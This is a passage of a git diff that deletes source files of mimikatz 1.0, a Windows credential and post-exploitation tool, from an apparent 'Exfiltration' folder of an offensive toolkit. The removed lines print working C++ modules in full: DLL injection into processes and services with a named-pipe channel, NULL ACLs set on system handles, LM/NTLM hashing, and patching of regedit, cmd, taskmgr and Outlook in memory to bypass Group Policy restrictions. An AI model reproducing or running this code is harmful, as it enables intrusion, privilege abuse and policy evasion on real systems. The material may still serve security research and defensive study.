&nouveauHandle, 0, false, DUPLICATE_SAME_ACCESS)) - { - wstring tokenType; - if(mod_system::getHandleType(nouveauHandle, &tokenType)) - { - bool toACL = true;; - if(!arguments->empty()) - toACL = find(arguments->begin(), arguments->end(), tokenType) != arguments->end(); - - if(toACL) - (*outputStream) << monHandle->ProcessId << L'\t' << monHandle->Handle << L'\t' << tokenType << L"\t\t" << (mod_secacl::nullSdToHandle(&nouveauHandle) ? L"NULL !" : L"KO") << endl; - } - CloseHandle(nouveauHandle); - } - CloseHandle(hProcess); - } - } - } - else (*outputStream) << L"mod_system::getSystemHandles ; " << mod_system::getWinError() << endl; - - delete mesHandles; - - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_handle.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_handle.h deleted file mode 100644 index 961991c..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_handle.h +++ /dev/null @@ -1,23 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_system.h" -#include "mod_process.h" -#include "mod_secacl.h" -#include <iostream> -#include <algorithm> - -class mod_mimikatz_handle -{ -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool list(vector<wstring> * arguments); - static bool processStop(vector<wstring> * arguments); - static bool tokenImpersonate(vector<wstring> * arguments); - static bool nullAcl(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_hash.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_hash.cpp deleted file mode 100644 index 302c05e..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_hash.cpp +++ /dev/null @@ -1,43 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_hash.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_hash::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(lm, L"lm", L"Hash LanManager (LM) d\'une chane de caractres")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(ntlm, L"ntlm", L"Hash NT LanManger (NTLM) d\'une chane de caractres")); - return monVector; -} - -bool mod_mimikatz_hash::lm(vector<wstring> * arguments) -{ - wstring chaine, hash; - - if(!arguments->empty()) - chaine = arguments->front(); - - if(mod_hash::lm(&chaine, &hash)) - (*outputStream) << L"LM(\'" << chaine << L"\') = " << hash << endl; - else - (*outputStream) << L"Erreur de calcul du hash LM" << endl; - return true; -} - -bool mod_mimikatz_hash::ntlm(vector<wstring> * arguments) -{ - wstring chaine, hash; - - if(!arguments->empty()) - chaine = arguments->front(); - - if(mod_hash::ntlm(&chaine, &hash)) - (*outputStream) << L"NTLM(\'" << chaine << L"\') = " << hash << endl; - else - (*outputStream) << L"Erreur de calcul du hash NTLM" << endl; - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_hash.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_hash.h deleted file mode 100644 index 96ac879..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_hash.h +++ /dev/null @@ -1,18 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_hash.h" -#include <iostream> - -class mod_mimikatz_hash -{ -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool lm(vector<wstring> * arguments); - static bool ntlm(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_impersonate.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_impersonate.cpp deleted file mode 100644 index 012c62a..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_impersonate.cpp +++ /dev/null @@ -1,25 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_impersonate.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_impersonate::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(revert, L"revert", L"RevertToSelf")); - return monVector; -} -bool mod_mimikatz_impersonate::revert(vector<wstring> * arguments) -{ - (*outputStream) << L"RevertToSelf : "; - if(RevertToSelf()) - (*outputStream) << L"ok"; - else - (*outputStream) << L"ko ; " << mod_system::getWinError(); - (*outputStream) << endl; - - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_impersonate.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_impersonate.h deleted file mode 100644 index da62b37..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_impersonate.h +++ /dev/null @@ -1,19 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_system.h" -#include "mod_process.h" -#include "mod_thread.h" -#include <iostream> - -class mod_mimikatz_impersonate -{ -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool revert(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_inject.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_inject.cpp deleted file mode 100644 index 74ca84d..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_inject.cpp +++ /dev/null @@ -1,120 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_inject.h" -#include "..\global.h" - -mod_pipe * mod_mimikatz_inject::monCommunicator = NULL; - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_inject::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(pid, L"pid", L"Injecte une librairire communicante dans un PID")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(process, L"process", L"Injecte une librairire communicante dans un processus")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(service, L"service", L"Injecte une librairire communicante dans un service")); - return monVector; -} - -bool mod_mimikatz_inject::process(vector<wstring> * arguments) -{ - wstring processName = arguments->front(); - wstring fullLib = arguments->back(); - - mod_process::KIWI_PROCESSENTRY32 monProcess; - if(mod_process::getUniqueForName(&monProcess, &processName)) - { - (*outputStream) << L"PROCESSENTRY32(" << processName << L").th32ProcessID = " << monProcess.th32ProcessID << endl; - injectInPid(monProcess.th32ProcessID, fullLib); - } - else (*outputStream) << L"Trop, ou pas de processus : \'" << processName << L"\' mod_process::getUniqueProcessForName : " << mod_system::getWinError() << endl; - - return true; -} - -bool mod_mimikatz_inject::service(vector<wstring> * arguments) -{ - wstring serviceName = arguments->front(); - wstring fullLib = arguments->back(); - - mod_service::KIWI_SERVICE_STATUS_PROCESS monService; - if(mod_service::getUniqueForName(&monService, &serviceName)) - { - (*outputStream) << L"SERVICE(" << serviceName << L").serviceDisplayName = " << monService.serviceDisplayName << endl; - (*outputStream) << L"SERVICE(" << serviceName << L").ServiceStatusProcess.dwProcessId = " << monService.ServiceStatusProcess.dwProcessId << endl; - injectInPid(monService.ServiceStatusProcess.dwProcessId, fullLib); - } - else (*outputStream) << L"Service unique introuvable : \'" << serviceName << L"\' ; mod_service::getUniqueForName : " << mod_system::getWinError() << endl; - - return true; -} - -bool mod_mimikatz_inject::pid(vector<wstring> * arguments) -{ - wstring strPid = arguments->front(); - wstring fullLib = arguments->back(); - - DWORD pid; - wstringstream monStream(strPid); - monStream >> pid; - - injectInPid(pid, fullLib, !(arguments->size() >= 3)); - - return true; -} - -bool mod_mimikatz_inject::injectInPid(DWORD & pid, wstring & libPath, bool isComm) -{ - bool reussite = false; - - if(!isComm || (isComm && !monCommunicator)) - { - if(reussite = mod_inject::injectLibraryInPid(pid, &libPath)) - { - if(isComm) - { - wstring monBuffer = L""; - - monCommunicator = new mod_pipe(L"kiwi\\mimikatz"); - (*outputStream) << L"Attente de connexion du client..." << endl; - - if(monCommunicator->createServer()) - { - (*outputStream) << L"Serveur connect un client !" << endl; - if(monCommunicator->readFromPipe(monBuffer)) - { - (*outputStream) << L"Message du processus :" << endl << monBuffer << endl; - } - else - { - (*outputStream) << L"Erreur : Impossible de lire le premier message ! ; " << mod_system::getWinError() << endl; - closeThisCommunicator(); - } - } - else - { - (*outputStream) << L"Erreur : Impossible de crer un canal de communication ! ; " << mod_system::getWinError() << endl; - closeThisCommunicator(); - } - } - else - (*outputStream) << L"Inject sans communication (legacy)" << endl; - } else (*outputStream) << L"Erreur : Impossible d\'injecter ! ; " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"Erreur : un canal de communicaton est dj ouvert" << endl; - - return reussite; -} - - -bool mod_mimikatz_inject::closeThisCommunicator() -{ - if(monCommunicator) - { - (*outputStream) << L"Fermeture du canal de communication" << endl; - delete monCommunicator; - monCommunicator = NULL; - } - return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_inject.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_inject.h deleted file mode 100644 index 92b4884..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_inject.h +++ /dev/null @@ -1,33 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_inject.h" -#include "mod_system.h" -#include "mod_process.h" -#include "mod_service.h" -#include "mod_pipe.h" -#include <iostream> - -class mod_mimikatz_inject -{ -private: - static bool injectInPid(DWORD & pid, wstring & libPath, bool isComm = true); - static void startComm(); - -public: - static mod_pipe * monCommunicator; - static bool closeThisCommunicator(); - - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - - static bool pid(vector<wstring> * arguments); - static bool process(vector<wstring> * arguments); - static bool service(vector<wstring> * arguments); - - static bool injectlegacy(vector<wstring> * arguments); - -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_minesweeper.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_minesweeper.cpp deleted file mode 100644 index 0d61227..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_minesweeper.cpp +++ /dev/null @@ -1,140 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_minesweeper.h" -#include "..\global.h" - -char DISP_MINESWEEPER[] = "012345678.F? !!"; - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_minesweeper::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(infos, L"infos", L"Obtient des informations sur le dmineur en cours")); - return monVector; -} - -bool mod_mimikatz_minesweeper::infos(vector<wstring> * arguments) -{ - structHandleAndAddr * maStruct = new structHandleAndAddr(); - if(giveHandleAndAddr(maStruct)) - { - STRUCT_MINESWEEPER_GAME monGame; - if(mod_memory::readMemory(maStruct->G, &monGame, sizeof(STRUCT_MINESWEEPER_GAME), maStruct->hMineSweeper)) - { -#ifdef _M_IX86 - if(mod_system::GLOB_Version.dwBuildNumber >= 7000) - monGame.pBoard = monGame.pBoard_WIN7x86; -#endif - STRUCT_MINESWEEPER_BOARD monBoard; - if(mod_memory::readMemory(monGame.pBoard, &monBoard, sizeof(STRUCT_MINESWEEPER_BOARD), maStruct->hMineSweeper)) - { - (*outputStream) << L"Mines : " << monBoard.nbMines << endl << - L"Dimension : " << monBoard.nbLignes << L" lignes x " << monBoard.nbColonnes << L" colonnes" << endl << - L"Champ : " << endl << endl; - - char ** monTableau; - monTableau = new char*[monBoard.nbLignes]; - for(DWORD l = 0; l < monBoard.nbLignes; l++) - monTableau[l] = new char[monBoard.nbColonnes]; - - parseField(maStruct, monBoard.ref_visibles, monTableau, true); - parseField(maStruct, monBoard.ref_mines, monTableau, false); - - for(DWORD l = 0; l < monBoard.nbLignes; l++) - { - (*outputStream) << L'\t'; - for(DWORD c = 0; c < monBoard.nbColonnes; c++) - (*outputStream) << monTableau[l][c] << L' '; - (*outputStream) << endl; - delete[] monTableau[l]; - } - delete[] monTableau; - } else (*outputStream) << L"Impossible de lire les donnes du plateau" << endl; - } else (*outputStream) << L"Impossible de lire les donnes du jeu" << endl; - CloseHandle(maStruct->hMineSweeper); - } - delete maStruct; - - return true; -} - -bool mod_mimikatz_minesweeper::parseField(structHandleAndAddr * monHandleAndAddr, PSTRUCT_MINESWEEPER_REF_ELEMENT laBase, char ** monTableau, bool isVisible) -{ - DWORD tailleElementFinal = isVisible ? sizeof(DWORD) : sizeof(BYTE); - - STRUCT_MINESWEEPER_REF_ELEMENT maRefElements; - if(mod_memory::readMemory(laBase, &maRefElements, sizeof(STRUCT_MINESWEEPER_REF_ELEMENT), monHandleAndAddr->hMineSweeper)) - { - PSTRUCT_MINESWEEPER_REF_ELEMENT * ref_colonnes_elements = new PSTRUCT_MINESWEEPER_REF_ELEMENT[maRefElements.nbElements]; - if(mod_memory::readMemory(maRefElements.elements, ref_colonnes_elements, maRefElements.nbElements * sizeof(PSTRUCT_MINESWEEPER_REF_ELEMENT), monHandleAndAddr->hMineSweeper)) - { - for(DWORD c = 0; c < maRefElements.nbElements; c++) - { - STRUCT_MINESWEEPER_REF_ELEMENT maRefColonneElement; - if(mod_memory::readMemory(ref_colonnes_elements[c], &maRefColonneElement, sizeof(STRUCT_MINESWEEPER_REF_ELEMENT), monHandleAndAddr->hMineSweeper)) - { - void * cellules = isVisible ? reinterpret_cast<void *>(new DWORD[maRefColonneElement.nbElements]) : reinterpret_cast<void *>(new BYTE[maRefColonneElement.nbElements]); - if(mod_memory::readMemory(maRefColonneElement.elements, cellules, maRefColonneElement.nbElements * tailleElementFinal, monHandleAndAddr->hMineSweeper)) - { - for(DWORD l = 0; l < maRefColonneElement.nbElements; l++) - { - if(isVisible) - monTableau[l][c] = DISP_MINESWEEPER[reinterpret_cast<DWORD *>(cellules)[l]]; - else - if(reinterpret_cast<BYTE *>(cellules)[l]) monTableau[l][c] = '*'; - } - } else (*outputStream) << L"Impossible de lire les lements de la colonne : " << c << endl; - delete[] cellules; - } else (*outputStream) << L"Impossible de lire les rfrences de la colonne : " << c << endl; - } - } else (*outputStream) << L"Impossible de lire les rfrences des colonnes" << endl; - delete[] ref_colonnes_elements; - } else (*outputStream) << L"Impossible de lire les rfrences de l\'lement" << endl; - - return true; -} - -bool mod_mimikatz_minesweeper::giveHandleAndAddr(structHandleAndAddr * monHandleAndAddr) -{ -#ifdef _M_X64 - BYTE PTRN_WIN6_Game_SafeGetSingleton[] = {0x48, 0x89, 0x44, 0x24, 0x70, 0x48, 0x85, 0xc0, 0x74, 0x0a, 0x48, 0x8b, 0xc8, 0xe8}; - LONG OFFS_WIN6_ToG = -(5 + 5 + 6 + 4 + 1); -#elif defined _M_IX86 - BYTE PTRN_WIN6_Game_SafeGetSingleton[] = {0x84, 0xc0, 0x75, 0x07, 0x6a, 0x67, 0xe8}; - LONG OFFS_WIN6_ToG = sizeof(PTRN_WIN6_Game_SafeGetSingleton) + 4 + 1; -#endif - RtlZeroMemory(monHandleAndAddr, sizeof(structHandleAndAddr)); - - wstring nomDemineur(L"minesweeper.exe"); - mod_process::KIWI_PROCESSENTRY32 monDemineur; - if(mod_process::getUniqueForName(&monDemineur, &nomDemineur)) - { - monHandleAndAddr->pidMineSweeper = monDemineur.th32ProcessID; - mod_process::KIWI_MODULEENTRY32 monModule; - if(mod_process::getUniqueModuleForName(&monModule, NULL, &monDemineur.th32ProcessID)) - { - PBYTE limit = monModule.modBaseAddr + monModule.modBaseSize, ptrTemp = NULL; - if(monHandleAndAddr->hMineSweeper = OpenProcess(PROCESS_VM_READ, false, monHandleAndAddr->pidMineSweeper)) - if(mod_memory::searchMemory(monModule.modBaseAddr, limit, PTRN_WIN6_Game_SafeGetSingleton, &ptrTemp, sizeof(PTRN_WIN6_Game_SafeGetSingleton), true, monHandleAndAddr->hMineSweeper)) - { -#ifdef _M_X64 - long offsetTemp = 0; - if(mod_memory::readMemory(ptrTemp + OFFS_WIN6_ToG, &offsetTemp, sizeof(offsetTemp), monHandleAndAddr->hMineSweeper)) - mod_memory::readMemory((ptrTemp + OFFS_WIN6_ToG) + sizeof(long) + offsetTemp + 1, &monHandleAndAddr->G, sizeof(monHandleAndAddr->G), monHandleAndAddr->hMineSweeper); -#elif defined _M_IX86 - if(mod_memory::readMemory(ptrTemp + OFFS_WIN6_ToG, &ptrTemp, sizeof(ptrTemp), monHandleAndAddr->hMineSweeper)) - mod_memory::readMemory(ptrTemp, &monHandleAndAddr->G, sizeof(monHandleAndAddr->G), monHandleAndAddr->hMineSweeper); -#endif - } - } - } - - bool reussite = monHandleAndAddr->hMineSweeper && monHandleAndAddr->G; - - if(!reussite && monHandleAndAddr->hMineSweeper) - CloseHandle(monHandleAndAddr->hMineSweeper); - - return reussite; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_minesweeper.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_minesweeper.h deleted file mode 100644 index f80be46..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_minesweeper.h +++ /dev/null @@ -1,72 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "globdefs.h" -#include "mod_process.h" -#include "mod_memory.h" -#include "mod_system.h" -#include <iostream> - -class mod_mimikatz_minesweeper -{ -private: - typedef struct _STRUCT_MINESWEEPER_REF_ELEMENT { - DWORD nbElements; - DWORD unk0; - DWORD unk1; - PVOID elements; - DWORD unk2; - DWORD unk3; - } STRUCT_MINESWEEPER_REF_ELEMENT, *PSTRUCT_MINESWEEPER_REF_ELEMENT; - - typedef struct _STRUCT_MINESWEEPER_BOARD { - PVOID Serializer; - DWORD nbMines; - DWORD nbLignes; - DWORD nbColonnes; - DWORD unk0; - DWORD unk1; - DWORD unk2; - DWORD unk3; - DWORD unk4; - DWORD unk5; - DWORD unk6; - DWORD unk7; - DWORD unk8; - DWORD unk9; -#ifdef _M_X64 - DWORD unk_x64; -#endif - DWORD unk10; - PVOID unk11; - PSTRUCT_MINESWEEPER_REF_ELEMENT ref_visibles; - PSTRUCT_MINESWEEPER_REF_ELEMENT ref_mines; - DWORD unk12; - DWORD unk13; - } STRUCT_MINESWEEPER_BOARD, *PSTRUCT_MINESWEEPER_BOARD; - - typedef struct _STRUCT_MINESWEEPER_GAME { - PVOID Serializer; - //PVOID pGameStat; on 7x86 - PVOID pNodeBase; - PVOID pBoardCanvas; - PSTRUCT_MINESWEEPER_BOARD pBoard; - PSTRUCT_MINESWEEPER_BOARD pBoard_WIN7x86; - } STRUCT_MINESWEEPER_GAME, *PSTRUCT_MINESWEEPER_GAME; - - typedef struct structHandleAndAddr{ - HANDLE hMineSweeper; - DWORD pidMineSweeper; - PVOID G; - } structHandleAndAddr; - - static bool giveHandleAndAddr(structHandleAndAddr * monHandleAndAddr); - static bool parseField(structHandleAndAddr * monHandleAndAddr, PSTRUCT_MINESWEEPER_REF_ELEMENT laBase, char ** monTableau, bool isVisible = true); - -public: - static vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> getMimiKatzCommands(); - static bool infos(vector<wstring> * arguments); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_nogpo.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_nogpo.cpp deleted file mode 100644 index bfc18f1..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/mod_mimikatz_nogpo.cpp +++ /dev/null @@ -1,210 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "mod_mimikatz_nogpo.h" -#include "..\global.h" - -vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> mod_mimikatz_nogpo::getMimiKatzCommands() -{ - vector<KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND> monVector; - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(regedit, L"regedit", L"Lance un diteur de registre, ignorant DisableRegistryTools")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(cmd, L"cmd", L"Lance une invite de commande, ignorant DisableCMD")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(taskmgr, L"taskmgr", L"Lance le gestionnaire de tache, ignorant DisableTaskMgr")); - monVector.push_back(KIWI_MIMIKATZ_LOCAL_MODULE_COMMAND(olpst, L"olpst", L"Lance Outlook, ignorant DisablePst")); - return monVector; -} - -bool mod_mimikatz_nogpo::regedit(vector<wstring> * arguments) -{ - (*outputStream) << L"Editeur de registre : " << (disableSimple(L"regedit.exe", L"DisableRegistryTools", L"KiwiAndRegistryTools") ? "OK" : "KO") << endl; - return true; -} - -bool mod_mimikatz_nogpo::cmd(vector<wstring> * arguments) -{ - (*outputStream) << L"Invite de commande : " << (disableSimple(L"cmd.exe", L"DisableCMD", L"KiwiAndCMD") ? "OK" : "KO") << endl; - return true; -} - -bool mod_mimikatz_nogpo::taskmgr(vector<wstring> * arguments) -{ - (*outputStream) << L"Gestionnaire de taches : " << (disableSimple(L"taskmgr.exe", L"DisableTaskMgr", L"KiwiAndTaskMgr") ? "OK" : "KO") << endl; - return true; -} - -bool mod_mimikatz_nogpo::olpst(vector<wstring> * arguments) -{ - char szDisable[] = "DisablePst"; - char szKiwi[] = "KiwiAndPst"; - - wstring pathToOutlook; - - if(getApplicationPathFromCLSID(L"Outlook.Application", &pathToOutlook)) - { - DWORD pidOutlook = 0; - bool reussite = disableSimple(pathToOutlook, szDisable, szKiwi, &pidOutlook); - - (*outputStream) << L"Outlook avec PST : " << (reussite ? L"OK" : L"KO"); - if(reussite) - { - mod_patch::patchModuleOfPID(pidOutlook, L"olmapi32.dll", reinterpret_cast<BYTE *>(szDisable), sizeof(szDisable), reinterpret_cast<BYTE *>(szKiwi), sizeof(szKiwi)); - } - } else (*outputStream) << L"Outlook introuvable" << endl; - return true; -} - -bool mod_mimikatz_nogpo::getApplicationPathFromCLSID(wstring application, wstring * path) -{ - bool reussite = false; - - DWORD regError; - - wstring pathToApplication = L"Software\\Classes\\"; - pathToApplication.append(application); - pathToApplication.append(L"\\CLSID"); - - HKEY hApplication; - - regError = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pathToApplication.c_str(), 0, KEY_READ, &hApplication); - if(regError == ERROR_SUCCESS) - { - DWORD ApplicationType = 0; - DWORD ApplicationSize = 0; - LPBYTE monGUID = NULL; - - regError = RegQueryValueEx(hApplication, L"", NULL, &ApplicationType, monGUID, &ApplicationSize); - if(regError == ERROR_SUCCESS) - { - if(ApplicationType == REG_SZ) - { - monGUID = new BYTE[ApplicationSize]; - - regError = RegQueryValueEx(hApplication, L"", NULL, &ApplicationType, monGUID, &ApplicationSize); - if(regError == ERROR_SUCCESS) - { - wstring regPathToPath = -#ifdef _M_X64 - L"Software\\Wow6432Node\\Classes\\CLSID\\"; -#elif defined _M_IX86 - L"Software\\Classes\\CLSID\\"; -#endif - regPathToPath.append(reinterpret_cast<wchar_t *>(monGUID)); - regPathToPath.append(L"\\LocalServer32"); - - HKEY hApplicationPath; - - regError = RegOpenKeyEx(HKEY_LOCAL_MACHINE, regPathToPath.c_str(), 0, KEY_READ, &hApplicationPath); - if(regError == ERROR_SUCCESS) - { - DWORD ApplicationPathType = 0; - DWORD ApplicationPathSize = 0; - LPBYTE monPath = NULL; - - regError = RegQueryValueEx(hApplicationPath, L"", NULL, &ApplicationPathType, monPath, &ApplicationPathSize); - if(regError == ERROR_SUCCESS) - { - if(ApplicationPathType == REG_SZ) - { - monPath = new BYTE[ApplicationPathSize]; - - regError = RegQueryValueEx(hApplicationPath, L"", NULL, &ApplicationPathType, monPath, &ApplicationPathSize); - if(reussite = (regError == ERROR_SUCCESS)) - { - path->assign(reinterpret_cast<wchar_t *>(monPath)); - } else (*outputStream) << "RegQueryValueEx \'" << monPath << "\' : " << mod_system::getWinError(false, regError) << endl; - delete[] monPath; - } else (*outputStream) << "Le type retourn par \'" << monPath << "\' n\'est pas : REG_SZ" << endl; - } else (*outputStream) << "RegQueryValueEx \'" << monPath << "\' : " << mod_system::getWinError(false, regError) << endl; - RegCloseKey(hApplicationPath); - } else (*outputStream) << "RegOpenKeyEx \'" << regPathToPath << "\' : " << mod_system::getWinError(false, regError) << endl; - } else (*outputStream) << "RegQueryValueEx \'" << monGUID << "\' : " << mod_system::getWinError(false, regError) << endl; - delete[] monGUID; - } else (*outputStream) << "Le type retourn par \'" << monGUID << "\' n\'est pas : REG_SZ" << endl; - } else (*outputStream) << "RegQueryValueEx \'" << monGUID << "\' : " << mod_system::getWinError(false, regError) << endl; - RegCloseKey(hApplication); - } else (*outputStream) << "RegOpenKeyEx \'" << pathToApplication << "\' : " << mod_system::getWinError(false, regError) << endl; - - return reussite; -} - - -bool mod_mimikatz_nogpo::disableSimple(wstring commandLine, SIZE_T taillePattern, PBYTE maCleDeDepart, const void * maCleFinale, DWORD * monPID) -{ - bool reussite = false; - - PROCESS_INFORMATION * mesInfos = new PROCESS_INFORMATION(); - if(mod_process::start(&commandLine, mesInfos, true)) - { - PEB * monPeb = new PEB(); - if(mod_process::getPeb(monPeb, mesInfos->hProcess)) - { - PBYTE patternAddr = NULL; - // Ici NULL est "tolr", pas de moyen simple de connaitre la taille en mode USER :( (enfin pour le moment) - if(mod_memory::searchMemory(reinterpret_cast<PBYTE>(monPeb->ImageBaseAddress), NULL, maCleDeDepart, &patternAddr, taillePattern, true, mesInfos->hProcess)) - { - if(!(reussite = mod_memory::writeMemory(patternAddr, maCleFinale, taillePattern, mesInfos->hProcess))) - { - (*outputStream) << L"mod_memory::writeMemory " << mod_system::getWinError() << endl; - } - } - else (*outputStream) << L"mod_memory::searchMemory " << mod_system::getWinError() << endl; - } - else (*outputStream) << L"mod_process::getPeb " << mod_system::getWinError() << endl; - - delete monPeb; - - if(!(ResumeThread(mesInfos->hThread) != -1)) - (*outputStream) << L"ResumeThread " << mod_system::getWinError() << endl; - - if(monPID) - { - *monPID = mesInfos->dwProcessId; - } - - WaitForInputIdle(mesInfos->hProcess, INFINITE); - - CloseHandle(mesInfos->hThread); - CloseHandle(mesInfos->hProcess); - } - else (*outputStream) << L"mod_process::execProcess " << mod_system::getWinError() << endl; - - delete mesInfos; - - return reussite; -} - -bool mod_mimikatz_nogpo::disableSimple(wstring commandLine, wstring origKey, wstring kiwiKey, DWORD * monPID) -{ - bool reussite = false; - - if(origKey.size() == kiwiKey.size()) - { - SIZE_T taillePattern = (origKey.size() + 1) * sizeof(wchar_t); - PBYTE maCleDeDepart = reinterpret_cast<PBYTE>(const_cast<wchar_t *>(origKey.c_str())); - const void * maCleFinale = kiwiKey.c_str(); - - reussite = disableSimple(commandLine, taillePattern, maCleDeDepart, maCleFinale, monPID); - } - else (*outputStream) << L"mod_mimikatz_nogpo::disableSimple (unicode) Taille du pattern original diffrente du pattern cible" << endl; - - return reussite; -} - -bool mod_mimikatz_nogpo::disableSimple(wstring commandLine, string origKey, string kiwiKey, DWORD * monPID) -{ - bool reussite = false; - - if(origKey.size() == kiwiKey.size()) - { - SIZE_T taillePattern = (origKey.size() + 1) * sizeof(char); - PBYTE maCleDeDepart = reinterpret_cast<PBYTE>(const_cast<char *>(origKey.c_str())); - const void * maCleFinale = kiwiKey.c_str(); - - reussite = disableSimple(commandLine, taillePattern, maCleDeDepart, maCleFinale, monPID); - } - else (*outputStream) << L"mod_mimikatz_nogpo::disableSimple (non-unicode) Taille du pattern original diffrente du pattern cible" << endl; - - return reussite; -} diff --git 